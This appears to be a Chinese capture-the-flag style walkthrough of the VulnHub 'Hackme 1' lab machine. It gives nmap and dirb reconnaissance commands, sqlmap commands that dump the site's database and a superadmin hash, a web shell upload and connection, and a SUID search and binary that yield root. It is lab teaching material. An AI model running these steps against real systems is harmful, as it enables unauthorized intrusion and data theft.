虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/hackme-1,330/
虚拟机简介:通过 Web 漏洞获得有限的权限访问,升级root 权限
目标:1个flag
级别:初级
1、信息收集
1.1 主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
1.2 服务探测
1.通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.151
查看开放22、80端口
2、渗透测试
2.1 WEB渗透
1.访问站点进行测试
2.网站测试
dirb http://192.168.207.151
发现上传目录文件夹
打开upload目录只有一张图片
3.注册账号
注册后登录账号
4.输入查询语句
输入字段插入单引号,发现回显不正常
5.使用SQLMap测试
使用burpsuite拦截请求数据包,并保存为post.txt
sqlmap -r posts.txt --dbs --batch
获取到数据库信息
6.获取数据库详细信息
sqlmap -r posts.txt -D webapphacking --dump-all --batch
查看存在superadmin账号
解密HASH值为:Uncrackable
6.文件上传
显示文件已经上传完成
7.查看uploads目录
使用冰蝎连接
2.2 主机渗透
1.查找suid权限文件
find / -perm -u=s -type f 2>/dev/null
查看/home/legacy/touchmenot存在suid权限
2.测试执行文件
cd /home/legacy/
./touchmenot
执行完毕后获取到root权限,无flag文件
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Hackme 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论